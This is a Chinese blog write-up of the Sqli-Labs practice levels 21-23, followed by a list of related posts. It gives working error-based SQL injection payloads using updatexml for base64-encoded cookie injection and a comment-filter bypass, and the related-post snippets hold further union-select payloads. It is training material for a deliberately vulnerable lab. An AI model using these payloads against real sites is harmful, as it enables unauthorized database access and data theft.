Sqli-Lab | Less 21-23

最新推荐文章于 2024-03-03 15:02:56 发布
最新推荐文章于 2024-03-03 15:02:56 发布
阅读量594 收藏 1
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41725312/article/details/86776937
版权
本文介绍了在Sqli-Lab靶场中Less-21到Less-23的Cookie注入问题,通过错误注入的方式进行攻击。在Less-21中,发现Cookie值经过Base64加密,利用Burp Suite抓包并解密。Less-22涉及到双引号闭合的payload,而Less-23则遇到过滤注释符的情况,通过调整payload绕过过滤。
摘要由CSDN通过智能技术生成

sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入

Less-21

Less-21 Cookie Injection- Error Based- complex - string

cookie注入-基于错误-复杂-字符串

测试

登录进去
]
uname的值被加密,以=结尾,首先想到base64

不出意外是base64加密
burp抓包,然后改cookie中的uname再加密就可以
payload

admin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#

源码

设置cookie并使用base64加密

调用cookie中的unamebase64加密,sql语句直接进行查询并返回错误和结果

Less-22

Less-22 Cookie Injection- Error Based- Double Quotes - string

cookie注入-基于错误-双引号-字符串
payload

admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#

Less-23

Error Based- strip comments

基于错误-有过滤

测试

http://127.0.0.1/sqli/Less-23/?id=1'


http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+


都多了个',应该是过滤掉了注释符,那直接用引号来闭合

http://127.0.0.1/sqli/Less-23/?id=1' or 1='1


payload:

1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1

源码

对注释符进行了替换

酉酉囧
关注
专栏目录
sqli labs less 21
Xiaoxiaoqiang_的博客
03-04 242
sql注入
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
最新发布
m0_73615178的博客
03-03 1150
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 3160
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
sqli-labs (less-21)
kukudeshuo的博客
03-11 333
sqli-labs (less-21) 进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密 转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了 #以下过程均是base64转码后的结果 先输入一个 Jw== #'单引号 屏幕回显错误,根据错误信息
sqli-labs————less 21
Fly_鹏程万里
05-12 1603
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一关的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该关的代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
SQLi LABS Less-21
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlibals21SQLI-LABS第二十一关,sqlilabs二十一关
sqli-labs less21
qq_45106794的博客
10-26 317
#sqli-labs less 19 这一关大概与less18差不多,只不过playload得用base64加密 ') order by 4 ') union select 1,2,3 # ')union select 1,database(),version()# ')union select 1,(select group_concat(table_name) from information...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1566
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2035
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1342
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-lab教程 less-7,8
xiaoyuhensuai的博客
07-08 303
查找原SQL语句:$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"在我们输入:?id=1时会显示“You are in.... Use outfile......”,从中发现在这一关中没有报错我们所需的内容。所有在这一关中我们要使用“布尔盲注”此时我们就需要使用“select length(database())”显示当前数据名字的长度和“select substr(database(),1,1)”显示当前熟即名字的第一个字母。对数据库长度进行推
Sqlilabs Less-21
Light_inthe_eyes的博客
03-10 278
登录成功后,burpsuite抓包,发现cookie是加了密: 去网上找解密工具: 接下来的cookie注入也应base64加密 爆表:
sqli-labs(23)
mmzkyl的博客
01-29 288
本关卡是使用 ’ 进行闭合,但是在注释的使用上做了一些限制 先测试下面这两个payload: http://192.168.2.60/sqli-labs/Less-23?id=1'# http://192.168.2.60/sqli-labs/Less-23?id=1'--+ 若是不对输入进行过滤,上面两个payload均是能够返回正常页面,但是测试后发现上述两个payload均无法返回正常页面 # 与 --均被过滤,本题最大的难题便是无法通过注释来注释掉多余的单引号,总而无法完成注入,使用上面两个pay
sql注入】Less21-25a
lyy0xfff的博客
07-16 241
SQL注入PrefaceLess-21Less-22Less-23Less-25Less-25a Preface 由于前面20关我已经做完了,所以后面的个别关卡只提供一个思路或者如何绕过防御以及证明注入点存在即可,思路都是Less-1我们学的子查询语句 Less-21 0x00 由题目得知这是一道Cookie注入的题目,且cookie被编码成base64的编码格式。 什么是base64编码呢 Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进
sqli-labs/Less-21
m0_71299382的博客
11-19 287
sqli-labs第二十一关
(手工)【sqli-labs23】联合查询+报错回显
07-11 403
SQL-联合查询+报错回显】
sqli-labs23
qq_53030229的博客
05-30 170
文章目录一、审查源码 一、审查源码 这里我就捡重要的代码挑出来说一下 preg_replace 函数执行一个正则表达式的搜索和替换,将reg $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replace, $id); $id = preg_replace($reg1, $replace, $id); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
sqli-labs-less-12 PODT传参+有回显信息(图文详解)
yzcn
11-02 506
Less-12 post传递参数 由于是post传参,我们先用burp-suite抓包,分析报文体,获取传参过程。 得到报文体之后使用hackbar插件中的post data进行注入实验 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 登录失败 uname=") or 1=1 #&passwd=&submit=Submit 登录成功,在这里可以得知存在注入点,闭合方式为(“”) 使用order by判断字段列数: uname
Sqlilabs-21
KAKA的博客
07-09 640
来到了第 21 关,看着 21 关,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文… 这一关卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 关一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样… Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入] uname=YWRtaW4nKSBhbm
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值